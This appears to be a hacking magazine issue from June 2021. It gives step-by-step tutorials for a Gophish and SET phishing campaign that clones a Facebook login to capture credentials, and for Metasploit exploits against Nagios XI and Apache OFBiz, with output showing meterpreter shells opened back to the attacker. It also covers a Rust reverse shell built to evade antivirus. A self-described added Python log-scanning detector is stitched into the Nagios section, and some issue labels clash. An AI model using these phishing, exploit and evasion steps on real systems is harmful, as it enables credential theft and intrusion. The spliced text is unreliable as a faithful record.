Hackercool - June 2021
[Cover: June 2021, Edition 4 Issue 6. Cover lines: "Using Rust to Bypass ..."; "What's New: Kali Linux 2021.2"]

Advertise with us. Contact: [email protected]
Copyright © 2016 Hackercool CyberSecurity (OPC) Pvt Ltd. All rights reserved. No part of this publication may be reproduced, distributed, or transmitted in any form or by any means, including photocopying, recording, or other electronic or mechanical methods, without the prior written permission of the publisher, except in the case of brief quotations embodied in critical reviews and certain other noncommercial uses permitted by copyright law. For permission requests, write to the publisher, addressed "Attention: Permissions Coordinator," at the address below.

Any references to historical events, real people, or real places are used fictitiously. Names, characters, and places are products of the author's imagination.

Hackercool Cybersecurity (OPC) Pvt Ltd., Banjara Hills, Hyderabad 500034, Telangana, India.
Website: www.hackercoolmagazine.com
Email Address: [email protected]
Information provided in this Magazine is strictly for educational purpose only. Please don't misuse this knowledge to hack into devices or networks without taking permission. The Magazine will not take any responsibility for misuse of this information.

Hackercool Magazine | May 2021

Then you will know the truth and the truth will set you free. John 8:32

Editor's Note
Edition 4 Issue 5

Just last week, I had time to read some article about Pricing Strategies for products and, after a lot of pondering, slashed the price of our Magazine by almost half. Our Readers should have already noticed it. We thought this fair in keeping with the current collapse of global economy due to Covid 19. However, we think there is some GOD's plan in action here. This price cut takes our price to almost the beginning days of Hackercool Magazine when it was sold only on Gumroad. Our Yearly Subscription cost 25$ back then while it is 24.99$ now. Those were tough days for me while I was a novice in not only ethical hacking but also creating the entire Magazine alone. Back then I was passionate about Ethical Hacking and wanted to get a job in Infosec domain. While why I started this Magazine is another great story, I started it and hosted it on Gumroad.

The Magazine was running but cyber security job eluded me. As time went by, it became difficult to meet ends. I had to take up a job as a Private Teacher and also tuitions to make my ends meet. The release of my Magazine got delayed by almost some months due to lack of time. It was at this time that most of my subscribers cancelled their subscription. My subscribers fell from 57 to 14. I don't blame them though for cancelling their subscription. They paid for something and they have a right to expect it. But some, some very very special subscribers held on. Maybe they were holding on to Faith just like me without any proof. It took some months and some very late nights' hard work to clear all my pending Issues.

But by GOD's grace I did it. I tried my best to get back and do justice to those subscribers who felt cheated and left. I got some of them back by giving entire One Year Issues Free to them. Efforts are still on my part to do justice to them. I think this price change by GOD is a part of it. Still, those subscribers on Gumroad (even cancelled also) are very very special to me. They kept a Dream alive and taught me an important lesson. Trust can be easily broken but very difficult to build.

"RANSOMWARE ATTACKS ARE ALWAYS UNACCEPTABLE BUT WHEN THEY TARGET CRITICAL INFRASTRUCTURE WE WILL SPARE NO EFFORT IN OUR RESPONSE." - US DEPUTY ATTORNEY GENERAL LISA MONACO

INSIDE

See what our Hackercool Magazine June 2021 Issue has in store for you.

1. It All Starts With An Email: How to setup a Phishing Campaign: Phishing Attack Simulation.
2. Hacking Q&A: Answers to some of the questions our readers ask.
3. Metasploit This Month: Apache OFBiz Deserialization and 3 Latest Nagios Modules
4. Bypassing Antivirus: Using Rust Programming to Bypass Antivirus
5. What's New: Kali Linux 2021.2
6. Online Security: Inside a ransomware attack: how dark webs of cybercriminals collaborate to pull one off
7. Tool Of The Month: Cactus Torch.
Downloads
Useful Resources

How To Set Up a Phishing Campaign - Phishing Attack Simulation

IT ALL STARTS WITH AN EMAIL

In some of the Real World Hacking Scenarios readers have seen in this magazine, victims were made to click on a link to compromise their system. In a recent example, we have seen Hackercool compromise a website and then host malware on that website. Then it was mentioned that he convinced victims to visit that malicious website. The process which was not shown in the April 2021 Issue is known as Social Engineering.

Social Engineering is very gravely underestimated.
When I learnt about Social Engineering as part of my CEH certification, I, Kalyan Chinta, personally thought of it as one chapter which could not be of any use to me. The reason for this was that it involved convincing users to allow their systems to be hacked. I thought, who would allow themselves to be hacked? Why would anyone install malware or click on a suspicious link intentionally? That would be simply foolish of him or her.

However, my opinion would change after some years when I took up the role of a cyber security trainer. As part of my training a new batch for CEH certification, one of the students wanted to try the phishing tutorial in Social Engineering Attack practically.

He created a phishing site of the Facebook Login page (Facebook was very popular, more than Instagram back then, and almost everyone wanted to hack someone's Facebook account. I once had a student from Africa who wanted to hack his girlfriend's FB account).

After successfully creating the phished copy of the Facebook Login page, he hosted it on a Wamp Server (Desktop phishing). Next came the trickiest part of this phishing practical: to convince the victims to visit this phishing site and submit their Facebook credentials. I thought he would lose his interest here. But within 10 minutes he was successful even in that.

What surprised me was not that he was successful in convincing a victim to visit his phishing site but the way in which he did it.

He just copied the link of the phishing site and sent this link to one of his friends through Facebook Messenger, and his friend not only clicked on the link but even submitted his Facebook credentials. I am sure readers have observed the shocking part of this. The friend of my student was already on Facebook and chatting through Facebook Messenger, and even then clicked on a link which opened a web page similar to Facebook. Note that the link was not even shortened or obfuscated. Even then he once again submitted his Facebook credentials.

This reminded me of a famous saying often used in cyber security. The saying says that the weakest link in cyber security is humans, as computers can be programmed but humans cannot.

From creation of fake websites to capture credentials, phishing has evolved and become one of the most potent hacking attacks to gain entry to a company's network. Norton Labs recently reported that phishing campaigns remain the top threat to consumer safety in 2021.

In this month's Issue, we are going to show our readers how a phishing campaign is created and run. Although this tutorial is similar to phishing campaigns run by malicious hackers, this campaign can also be used to test the security of a company by assessing how vulnerable the employees of the company are to a phishing attack.

There are many tools to simulate phishing attacks which are used by Red Team professionals. I will use one such tool named Gophish. Gophish is an open-source phishing toolkit designed for businesses and penetration testers. It provides the ability to quickly and easily set up and execute phishing engagements and security awareness training. It is available for both Windows and Linux operating systems.

I will be using a Windows version of Gophish as I want to install it on Windows. Installing Gophish on Windows is damn easy. Just download Gophish for Windows (the download information is given in our Downloads section).

Extract the contents of the zip archive. After extraction is completed, open Windows command line, navigate into the extracted directory and execute the Gophish executable as shown below. This executes some commands as shown below.

[Screenshot: CMD window running the Gophish executable, with the dashboard username and password highlighted]

If you observe the CMD window, you will find the username and password for the Gophish dashboard. This part is highlighted in the image above. These credentials are needed to log in to the Gophish dashboard.
Keep the CMD window open. Open a browser and enter the address https://127.0.0.1:3333. This is the default port on which Gophish runs. If you get any certificate error, click on Advanced to bypass it and then submit the above-mentioned credentials.

[Screenshot: browser warning "Your connection isn't private"]
[Screenshot: Gophish "Please sign in" page]

The first thing you will see after logging in is that the system prompts you to reset your password. Reset the password.

[Screenshot: "Reset Your Password"]

Now you can access the Gophish dashboard.

The first thing we need to do is create a sender profile. This is the mail address from which the spear phishing email comes.

[Screenshot: "Sending Profiles" page]

Click on the "Sending Profiles" tab and then click on "New Profile" to create a new Sending Profile.

Set the options for the sending profile. For example, we set the name for this as phishing campaign 1. To send any type of email, we'll need an SMTP server. For this tutorial, I will be using the SMTP server of Gmail as I will be sending an email from Gmail. In real world phishing attacks and even in many phishing simulations, a new domain is created and the email is sent from that domain's mail to make the phishing email appear genuine. The username is the Gmail username and the password is the Gmail password.

[Screenshot: "New Sending Profile" form]

Save the changes. Send a test email to the email of your choice to see if the phishing email appears as you want it to be.

The username we specify is very important here as it will be displayed. So it has to be made as convincing as possible. Once you are satisfied with the sending profile, you can save it.

Next, we need to create Users and Groups. This is where we assign target users for our phishing campaign.

[Screenshot: "Users & Groups" page]

Click on "New Group" to create a new batch of recipients. I have named this group Target_1.

[Screenshot: "New Group" form]

For this tutorial, I will add only a single recipient. If you want to add a large number of users, you can save them in a CSV file and just import those users with the "Bulk Import Users" option.

[Sidebar, partly illegible: The first phishing ... (AOL) and the accused were the members of warez community who exchanged unlicensed ... active on black hat hacking si... The authorities of AOL ... these accounts by detecting words in their ...]

It's time to create an email template. This is the most important part of a phishing email since it has the email body that convinces a victim to click or take any other action.

"A single spear-phishing email carrying a slightly altered malware can bypass multi-million dollar enterprise security solutions if an adversary deceives a cyber-hygienically apathetic employee into opening the attachment or clicking a malicious link and thereby compromising the entire network." - James Scott, Sr. Fellow, Institute for Critical Infrastructure Technology

But before we compose the spear phishing email, let's create a phishing website. For this tutorial, we will be capturing some credentials. We will create this fake website using Social Engineering Toolkit in Kali Linux.

[Screenshot: Social-Engineer Toolkit startup banner. Recoverable text: "New set.config.py file generated on: 2021-06-15 20:07:13.59262", "Verifying configuration update"]
[Screenshot: Social-Engineer Toolkit main menu. Recoverable text: "It's easy to update using the PenTesters Framework! (PTF) Visit https://github.com/trustedsec/ptf to update all your tools!", "Select from the menu:", "2) Penetration Testing (Fast-Track)"]

Select the "website attack vectors" option.

[Screenshot: attack vector menu. Recoverable entries: Spear-Phishing Attack Vectors, Wireless Access Point Attack Vector, QRCode Generator Attack Vector, Powershell Attack Vectors]

Select the site cloner option since we want to create a fake website of another website.

[Screenshot: site cloner prompts. Recoverable text:
1) Web Templates
2) Site Cloner
set:webattack> IP address for the POST back in Harvester/Tabnabbing [192.168.36.171]:
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone: https://facebook.com
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below]

The phishing site is ready and will display any captured credentials on this terminal. Go back to Gophish.

Click on "New Template" to create a new email template.

Remember what I said. This part is the most important, and the content of the email should convince the user to take whatever action you want him to take. We are just showing the age-old account suspension mail. Let's have a look at some of the spear phishing emails used in real world hacking attacks.

[Screenshot: phishing email impersonating GoDaddy: "About Your Recent Domain Purchase", "Final Notice For Domain Verification"]

The above mail is sent to GoDaddy customers. The logo, customer support number etc. almost convince even me, but just look at the sender email. The domain of GoDaddy is godaddy.com but the sender email is really phishy.

[Screenshot: phishing email impersonating SunTrust Customer Care, addressed "Dear SunTrust Client", claiming unusual access to the online account and asking the recipient to sign on to Online Banking with user ID and password]

The above phishing email is a must read. Everything looks so convincing. Even I think I have an account at SunTrust.
Only when we hover over the link can we see that it is suspicious.

[Screenshot: phishing email impersonating Instagram, subject "Your Instagram password has been changed"]

The above mail is directed towards Instagram users. Although the sender email is phishy, have a look at the message of the mail. It says your Instagram password has been changed, and if it is not you that changed the password, you are asked to click on the link they have provided to reset your password. It even provides a link to the Instagram Help Center to appear trustworthy.

I am sure readers got an idea about what phishing emails look like. If you find an email suspicious, just hover over the links instead of clicking on them.

Once the body of the email is complete, let's add a hyperlink to the email content. Click on "Source".

I want the users to be redirected to my Kali Linux attacker machine.

[Sidebar: The costliest phishing attack targeted Facebook and Google, and they together lost more than $100 million when a Lithuanian hacker used fake invoices to trick their employees into transferring money to his bank accounts. The hacker, Evaldas Rimasauskas, operated by setting up a fake company with a name similar to Quanta, another company. Both Google and Facebook had business relations with the Quanta company.]

The email template is ready. It's time to set the landing page. The landing page in Gophish is the page where users will be redirected to after clicking a link in the email.

"I can go into LinkedIn and search for network engineers and come up with a list of great spear-phishing targets because they usually have administrator rights over the network. Then I go onto Twitter or Facebook and trick them into doing something and I have privileged access."

Click on "New Page". You can create a new landing page or you can import an already created landing page.

Let me import the phishing site I created in SE Toolkit on Kali Linux. Just like any phishing website, we can redirect the users to another webpage after capturing credentials. I want the victims to be redirected to the genuine site of Facebook.

Save the landing page.

Everything is ready. It's time to start the phishing campaign. Go to Campaigns and click on "New Campaign".

[Pull quote, partly illegible: "Amateur hackers hack machines while expert ..."]

Specify all the options like URL, the recipients etc. and click on "Launch Campaign". You can set the date and timing for the phishing campaign.

[Screenshot: confirmation dialog "Are you sure?"]
[Screenshot: "Campaign Scheduled!"]

In the dashboard you can view the result of the campaign. You can see how many victims read your email and how many fell victim to your phishing campaign.

[Screenshot: campaign results and details]

This is how the spear phishing email I created looks in the email inbox.

[Screenshot: inbox entry "Hurry! Your Facebook account is under suspension."]

Here is the content of the email.

[Screenshot: email body: "We found suspicious activity on your account ... and is currently under suspension. To claim your account please login into facebook now by clicking below."]

Here is the phishing site the user is redirected to once he clicks on the link.

[Screenshot: cloned "Log into Facebook" page]

Once he fails to notice the signs of a phishing email, he enters his credentials.

[Screenshot: cloned "Log into Facebook" page with credentials entered]

These credentials are captured in SE Toolkit as shown below.
[Screenshot: SE Toolkit output. Recoverable text: "POSSIBLE USERNAME FIELD FOUND: skip_api_login="]

Credentials are captured and our phishing campaign is successful. This is how a successful campaign is run.

Hacking Q&A

Q1: How did one password allow hackers to disrupt Colonial Pipeline?
A: Hackers gained access to the network of Colonial Pipeline using a single password. This password belonged to a VPN account of a user who worked in Colonial Pipeline. Virtual private networks are used by employees to connect remotely to the company's network. The surprising part of this is that the user to whom these credentials belonged has left the company. However, the account was still active.
It is not known how hackers got this account but it is assumed that the user credentials were part of a different data breach earlier. Maybe the user reused this password for the company's VPN. This is a result of poor cyber security practices.

Q2: What is the difference between BTech IT and BTech Cyber Security? Which is better for becoming a penetration tester?
A: B.Tech Information Technology is an undergraduate course of four years which deals with both software and hardware components of a computer. B.Tech Cybersecurity is also an undergraduate course but it stresses subjects like Cyber Crime, Computer Security, Network Security, Cryptography, Intrusion Detection and Prevention.
If your career goal is becoming a penetration tester, you should choose B.Tech Cyber Security as it covers more topics you need in future.

Q3: If a file scanned by an anti-virus software is cleared as "safe", will that file be really clear of any malware?
A: Absolutely no. As I always say, the battle between malware and anti-malware is a never ending arms race. The presence of an antivirus only improves security a bit. I say so because hackers are always trying to bypass this antivirus. We have seen two cases in our previous Issue and the present Issue. Recently hackers have been using payloads written in Nim and Rust to bypass anti-malware. So we can say just because the Antivirus says the file is safe

editor@hackercoolmagazine.com

... Metasploit This Month feature of this year. Let us learn about the latest exploit modules of Metasploit and how they fare in our tests.

Nagios XI Scanner Module

TARGET: Nagios XI (almost all versions)
TYPE: Remote
Module: Auxiliary
ANTI-Malware: NA

This auxiliary module detects the version of the Nagios XI web application and suggests matching exploit modules (if any) for the detected version. We have tested this module on Nagios XI 5.6.5 running on CentOS 7. We updated Metasploit and loaded the auxiliary/scanner/http/nagios_xi_scanner module.

[Screenshot: "Module options (auxiliary/scanner/http/nagios_xi_scanner)" listing]

Note that this is an authenticated module. So I set all the options including credentials as shown below.

[Screenshot: msf6 console. Recoverable commands: "set verbose true", "set password admin"]

After all the options are set, I execute the module.
[Screenshot: scanner output. Recoverable text: "Successfully authenticated to Nagios XI", "version 5.6.5", a list of suggested exploit modules including one for CVE-2020-35578, "Scanned 1 of 1 hosts (100% complete)"]

As readers can see, the module not only detected the version of Nagios XI but also suggested some exploits for this version. Since our readers have already seen the nagios_xi_mibs_authenticated_rce and nagios_xi_plugins_check_plugin_authenticated_rce modules in our previous Issues, let's see some new modules.

Nagios XI Plugins Filename Authenticated RCE Module

This module exploits a command injection vulnerability (CVE-2020-35578) present in the above mentioned versions of Nagios XI. This vulnerability is present in the /admin/monitoringplugins.php page. The module is an authenticated module and needs credentials to work. Once it detects a vulnerable target, the module sends an HTTP POST request to /admin/monitoringplugins.php. This request contains a file whose filename is set such that it will escape the existing command that /admin/monitoringplugins.php uses on its backend and will instead cause the server to start executing the attacker's own commands as the 'apache' user.

Once the file upload is finished, a new plugin entry will be created along with a corresponding file in /usr/local/nagios/libexec/ with the malicious payload as the file name. The uploaded malicious file is deleted once a meterpreter session is spawned. Let's see how this module works.
[Screenshot: "Module options (exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce)" listing. Recoverable setting: USERNAME nagiosadmin]

... vulnerable.

[Screenshot: msf6 console output. Recoverable text:
[*] Attempting to authenticate to Nagios XI...
[+] Successfully authenticated to Nagios XI
lhost => 192.168.36.189
Command Stager progress - 100.00% done (122/122 bytes)
Sending stage (984904 bytes) to 192.168.36.195
Meterpreter session 2 opened (192.168.36.189:4444 -> 192.168.36.195:49790)
BuildTuple : i486-linux-musl
meterpreter >]

... on the target with apache privileges.

Nagios XI Plugins SNMP RCE Module

TARGET: Nagios XI 5.5.0 to 5.7.3
TYPE: Remote
Module: Exploit
ANTI-Malware: NA

This module exploits a command injection vulnerability (CVE-2020-5792) present in the above mentioned versions of Nagios XI. This vulnerability exists in the includes/components/nxti/index.php page. The module is an authenticated module and needs credentials to work. The module first checks if the target is vulnerable. Once it detects a vulnerable target, the exploit module uploads a simple PHP shell via includes/components/nxti/index.php to includes/components/autodiscovery/jobs/ . Then this uploaded PHP shell is executed via an HTTP GET request to includes/components/autodiscovery/jobs/ ? =

This will result in the command specified by the attacker being run with apache user privileges. Let's see how this module works. We have tested this module on Nagios XI 5.6.5 running on CentOS 7. Load the nagios_xi_plugins_snmptrap_authenticated_rce module.

[Screenshot: module options listing. Recoverable setting: TARGETURI /nagiosxi/]

Note that this is an authenticated module. So I set all the options including credentials as shown below. The check command confirms that the target is indeed vulnerable.
[Screenshot: rhosts is set to 192.168.36.195 and the check command is run; the legible output includes "[+] Successfully authenticated to Nagios XI". lhost is then set and the module is run.]

After all the options ar

"We're all going to have to change how we think about data protection." Elizabeth Denham

    msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > run
    Started reverse TCP handler on 192.168.36.189:4444
    Executing automatic check (disable AutoCheck to override)
    Attempting to authenticate to Nagios XI...
    Successfully authenticated to Nagios XI
    [...]
    Attempting to execute the initial payload via /nagiosxi/includes/components/autodiscovery/jobs/scnNLwPNT.php?a=
    Command Stager progress - 100.00% done (773/773 bytes)
    Sending stage (984904 bytes) to 192.168.36.195
    Deleted /usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/scnNLwPNT.php
    Meterpreter session 1 opened (192.168.36.189:4444 -> 192.168.36.195:49760)
    [...]
    Architecture : x64
    BuildTuple   : i486-Linux-musl
    Meterpreter  : x86/Linux
    meterpreter > getuid
    [...]

As readers can see, I successfully have a meterpreter session on the target with apache privileges.

Apache OFBiz SOAP Deserialization RCE Module

Apache OFBiz is an open source ERP (Enterprise Resource Planning) software that provides a common data model and a set of business processes like accounting, asset maintenance, project management etc. The above mentioned versions have an unauthenticated Java deserialization vulnerability. This vulnerability is present in the SOAP endpoint (webtools/control/SOAPService). We have tested this on a Docker container of Apache OFBiz 15.12. Let's set the target first. This can be done by running the docker command (you should have docker installed) as shown below.
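Back to the Nagios XI run above: its output shows the payload being staged as a PHP file under /nagiosxi/includes/components/autodiscovery/jobs/ and deleted afterwards, so the web server's access log is where the request survives. The following is an added example, not code from the magazine or from Metasploit: a Python scan of Apache combined-format log lines for script requests under that directory. The log lines are constructed, and treating any script file in that directory as suspicious is an assumption.

```python
import posixpath
import re
from urllib.parse import unquote

# Directory the module output on this page shows the payload staged in.
JOBS_DIR = "/nagiosxi/includes/components/autodiscovery/jobs/"
# Assumption: nothing legitimate is served as a script from that directory.
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.IGNORECASE)
# Apache "combined" log format, up to the status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Constructed sample lines (documentation IP ranges, placeholder query values).
SAMPLE_LOG = """\
198.51.100.7 - - [02/Jun/2021:10:01:11 +0000] "POST /nagiosxi/login.php HTTP/1.1" 302 - "-" "Mozilla/5.0"
198.51.100.7 - - [02/Jun/2021:10:01:19 +0000] "GET /nagiosxi/includes/components/autodiscovery/jobs/scnNLwPNT.php?a=CONSTRUCTED HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [02/Jun/2021:10:05:02 +0000] "GET /nagiosxi/includes/components/autodiscovery/%6Aobs/x1.PHP HTTP/1.1" 404 196 "-" "curl/7.38.0"
198.51.100.20 - - [02/Jun/2021:10:06:40 +0000] "GET /nagiosxi/includes/components/autodiscovery/index.php HTTP/1.1" 200 9100 "-" "Mozilla/5.0"
198.51.100.20 - - [02/Jun/2021:10:06:44 +0000] "GET /nagiosxi/includes/components/autodiscovery/jobs/abc123.xml HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
198.51.100.7 - - [02/Jun/2021:10:09:57 +0000] "GET //nagiosxi/includes/components/autodiscovery/../autodiscovery/jobs/y2.php?a=CONSTRUCTED HTTP/1.1" 200 87 "-" "Mozilla/5.0"
this line is not in combined log format
"""


def normalise(target):
    """Split off the query, percent-decode once, and collapse //, ./ and ../
    so encoded or padded spellings of the directory still match."""
    raw_path, _, query = target.partition("?")
    path = re.sub(r"/+", "/", unquote(raw_path))
    return posixpath.normpath(path), query


def scan(lines):
    """Return one finding per request for a script file under JOBS_DIR."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable lines are skipped, not treated as clean
        path, query = normalise(m["target"])
        if path.startswith(JOBS_DIR) and SCRIPT_EXT.search(path):
            findings.append({
                "line": lineno,
                "client": m["ip"],
                "time": m["ts"],
                "method": m["method"],
                "path": path,
                "file": posixpath.basename(path),
                "query": query,
                "status": int(m["status"]),
            })
    return findings


def summarise(findings):
    """Group findings per file: who asked for it and whether it was served."""
    summary = {}
    for f in findings:
        entry = summary.setdefault(
            f["file"], {"clients": set(), "statuses": [], "served": False})
        entry["clients"].add(f["client"])
        entry["statuses"].append(f["status"])
        # A 2xx answer means the file existed when it was requested.
        entry["served"] = entry["served"] or 200 <= f["status"] < 300
    for entry in summary.values():
        entry["clients"] = sorted(entry["clients"])
    return summary


if __name__ == "__main__":
    for name, info in summarise(scan(SAMPLE_LOG.splitlines())).items():
        print(name, info)
```

A file that was served in the log but is no longer on disk matches the "Deleted ..." step in the run above.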
[Screenshot: output of the docker command, followed by the OFBiz container's log (entries dated 2021-06-02 from the http-nio-8443 threads).]

After the target is set, load the apache_ofbiz_deserialization_soap module.

[Screenshot: module search results listing "Apache OFBiz SOAP Java Deserialization" and "Apache OFBiz XML-RPC Java Deserialization", followed by the selected module's options listing.]

I set all the options as shown below. The check command confirms that the target is indeed vulnerable.
[Screenshot: the options are set and the check command is run.]

    msf6 exploit(linux/http/apache_ofbiz_deserialization_soap) > check
    [...]

After all the options are set, I execute the module.

    Started HTTPS reverse handler on https://172.17.0.1:4455
    Executing automatic check (disable AutoCheck to override)
    [...]
    Client 172.17.0.2 (curl/7.38.0) requested /pwSsuvr8y9tT
    Sending payload to 172.17.0.2 (curl/7.38.0)
    [...]

[The rest of the output is not legible; it shows the handler at https://172.17.0.1:4455 handling requests from 172.17.0.2.]

BYPASSING ANTIVIRUS

Rust is a programming language that began as a personal project in the year 2006 by Graydon Hoare, an employee of Mozilla. Named after a family of fungi (we find it odd too), Rust is becoming increasingly popular nowadays. It is termed an efficient and easy to use language which is considered safe too. It has been Stack Overflow's most loved language from 2016 to 2020.

However, it doesn't seem these are the features that are making hackers interested in Rust. It's for a different reason altogether. Buer downloader was coded in C since 2019. However, this time it is written in Rust. Rewriting the malware in a new language like Rust enables hackers to better evade Buer detection mechanisms. Since Buer was written in C since it began, anti-malware vendors would write detection signatures for C only. So they would naturally fail to detect Buer in Rust, an unexpectedly new language.

In this article readers will learn how to work with Rust payloads in Kali Linux, create a reverse shell and test its antivirus evasion capabilities practically. Rust can be downloaded on Kali Linux by using the command given below.

[Screenshot: the install command, which fetches https://sh.rustup.rs; the rest of the command is not legible.]

    Welcome to Rust!
    [...]
    Rustup metadata and toolchains will be installed into the Rustup
    [...]
    /home/kali/.cargo

    This can be modified with the CARGO_HOME environment variable

    The cargo, rustc, rustup and other commands will be added to
    Cargo's bin directory, located at:
    [...]
    You can uninstall at any time with rustup self uninstall and
    these changes will be reverted
    [...]
    default host triple: i686-unknown-linux-gnu
    default toolchain: stable (default)
    [...]
    modify PATH variable: yes

    1) Proceed with installation (default)
    [...]

Proceed with the default installation.

    profile set to 'default'
    [...]
    syncing channel updates for 'stable-i686-unknown-linux-gnu'
    latest update on 2021-05-10, rust version 1.52.1 (9bc8c42bb 2021-05-09)
    [...]
    info: downloading component 'clippy'
    [...]
    info: installing component 'rustfmt'
    [...]
    This would reload your PATH environment variable to include
    Cargo's bin directory ($HOME/.cargo/bin).

We need to update the cargo and rust prot[...] rust commands from anywhere on the terminal.

We can test if Rust is successfully installed on Kali using the command rustc --version. Rust is installed successfully. It's time to work with Rust programming. We create a new directory named rust-lang to hold all the Rust programs we create.
[Screenshot: output of rustc --version, followed by the creation of the rust-lang directory.]

Inside this directory, we create a new file named test.rs (the name can be anything) and write a small program. This is the famous hello world program, which we edited a bit to display the message "Hello Hackercool Labs. If this message is displayed, you can be sure rust is working".

[Screenshot: source of test.rs.]

We save the file and compile it using the Rust compiler as shown below. This will create a binary of the Rust source file.

[Screenshot: test.rs is compiled and the directory then contains the test binary next to test.rs.]

We execute it just as we execute any Linux binary.

[Screenshot: the binary prints the "Hello Hackercool Labs. If this message is displayed you can be sure rust is working" message.]

The program is working fine. Well, this is not just it. Rust has a package manager and build system named Cargo. Cargo builds code, downloads the libraries needed for this code to run and builds those libraries without users needing to do it manually.

[Screenshot: cargo's usage and help output.]

[...] also has another directory named src. Inside the src dire[...]

[Screenshot: cargo reports "Created binary (application) `hello_hackercool` package"; the generated Cargo.toml lists authors = ["kali"] and a comment pointing to https://doc.rust-lang.org for more keys and their definitions.]

By default, this is the default hello world script.
[Screenshot: main.rs in ~/rust-lang/hello_hackercool/src.]

[Screenshot: the build output, beginning "Compiling hello_hackercool v0.1.0 (/home/kali/rust-lang/hello_h...", followed by a listing of the target directory that contains the hello_hackercool binary.]

This file can be executed using the cargo run command.

    Finished dev [unoptimized + debuginfo] target(s) in 0.01s
    [...]

The program is running fine as it printed back the message. Now let's create a new project which is that

[Screenshot: cargo reports "Created binary (application) `reverse_shell` package".]

The information to download the source code for the Rust reverse shell can be found in our Downloads section. Copy this code into the main.rs file of the reverse_shell directory.

[Screenshot: main.rs in ~/rust-lang/reverse_shell/src; the source is not legible.]

Let's build this reverse shell project in the same way as we built the hello world project.
[Screenshot: the build in ~/rust-lang/reverse_shell finishes with "dev [unoptimized + debuginfo] target(s) in 3.88s".]

Before executing the reverse shell, we start a netcat listener on the same machine.

    Listening on [any] 4444
    [...]
    connect to [192.168.36.171] from (UNKNOWN) [192.168.36.171] 60548

When we execute the binary, we successfully get a connection, of course from the same machine. The shell is working. Here comes the important part. The rust reverse shell is working but how does it

Kali Linux 2021.2 WHAT'S NEW

The makers of Kali Linux released the second release of Kali Linux, Kali Linux 2021.2 on June 1 2021. Let's see what's new in this release.

Hi All. I am Mala and today I am gonna show you what's new in the newly released Kali Linux 2021.2. The first thing I noticed after booting up Kali Linux 2021.2 is its new Login Background. I logged in (credentials kali:kali) and also see a new Desktop background. [...]

Normally, the makers of Kali would change the default login and desktop as well as other art work every six months. From this release, they are going to change the defaults at every 20xx.1 release, that is, at the beginning of the year. They also said that they will still add extra wallpapers every 6 months, however, only change the defaults yearly.

They also made some changes to the Quick Launch Tray in the top left. The Screen recorder has been removed and the mousepad text editor and a web browser icon have been added. Adding a text editor is a good move as it is cumbersome to open a terminal and then a text editor every time we need to add notes.
[Screenshot: the Kali desktop with the "Welcome to Kali Linux, The Industry's Most Advanced Penetration Testing Distribution" page open.]

The Quick Launch Tray also has a drop down menu for the default Terminal.

All the applications we open can be seen to the right of the Quick Launch Tray. Xfce's default file manager, Thunar, also got some changes. If you open the File Manager and right-click in the main window, you can see a new option, Open as Root. This can be used to open some directories which need higher privileges.

[Screenshot: Thunar's right-click menu.]

If users have been using the latest versions of Kali recently, you should have observed that the default ZSH has a two-line prompt as shown below.

However, this change is temporary and is only effective for the current session. This can be made permanent using kali-tweaks. What is kali-tweaks? Kali-tweaks, introduced in this release only, is a little helping hand for Kali users, to help them customize Kali according to their personal taste quickly, simply, and the correct way. Users can make changes to four things using kali-tweaks. They are Metapackages, Network Repositories, Shell & Prompt and Virtualization.

[Screenshot: the kali-tweaks main menu with the entries Metapackages, Network Repositories (configure network repositories for APT sources), Shell & Prompt (configure the shell and command prompt) and Virtualization (additional configurations for virtual machines).]
Metapackages can be tweaked to install and remove groups of tools, which may not have been available while installing Kali if you did not use the particular installer image.

[Screenshot: the Metapackages menu. Legible entries: bluetooth attacks tools, crypto-stego (cryptography and steganography tools), fuzzing (fuzzing attacks tools), gpu (GPU tools), hardware (hardware attacks tools), rfid (RFID tools), sdr (SDR tools), top10 (Kali Linux's top 10 tools), voip (VoIP tools), windows-resources (Windows resources) and kali-linux-default (Kali Linux's default packages, headless & GUI).]
Using kali-tweaks, network repositories can be tweaked. Users can enable or disable the "bleeding-edge" and "experimental" branches.

[Screenshot: the Network Repository menu, "Additional Kali repositories": bleeding-edge (automatically packaged and potentially unstable) and experimental (staging area for work-in-progress packages).]

Using kali-tweaks, users can switch between the two-line and one-line prompt (as already mentioned), enable or disable the extra line before the prompt, or configure Bash or ZSH as the default shell.

[Screenshots: the Shell & Prompt menu with the entries Default Login Shell (set the default login shell) and Reset Shell Config (reset the shell config files to their default); the Command Prompt menu with the prompt styles Two Lines (dual blue line prompt), One Line (single blue line prompt) and BackTrack (legacy BackTrack red prompt) and the prompt setting Newline (add a new line between output and prompt); and the "Default login shell to use" menu offering Bash (Bourne Again SHell) and ZSH (Z SHell).]

If you are running Kali as a guest OS in VMware or VirtualBox, then you can use kali-tweaks to improve some features. However, it returned some error to me while checking it out. Might be a bug.
[Screenshot: selecting Virtualization ends in a Python traceback from /usr/lib/python3/dist-packages/kali_tweaks/__main__.py (line 699, in main; line 531); the error message itself is not legible.]

It might be fixed soon. Let me move forward. With this release, the kernel has been patched to enable users to use ports 0-1023 without SUDO privileges. This is quite useful to Hackercool Labs, as earlier we needed SUDO privileges to start a listener on common ports, even in Metasploit. For example, while setting up a meterpreter/reverse_https or meterpreter/reverse_http listener, the listening port commonly needed is 443 and 80 respectively. They needed SUDO privileges earlier.

    listening on [any] 80 ...
    [...]
    Using configured payload generic/shell_reverse_tcp
    msf6 exploit(multi/handler) > set lhost 192.168.36.192
    lhost => 192.168.36.192
    msf6 exploit(multi/handler) > set lport 80
    lport => 80
    [...]
    Started reverse TCP handler on 192.168.36.192:80

Just like other releases of Kali Linux, this version too got some new tools added in Kali's archive and network repositories. These tools are,

1. CloudBrute - Find a company infrastructure, files, and apps on the top cloud providers
2. Dirsearch - Brute force directories and files in web servers
3. Feroxbuster - Simple, fast, recursive content discovery
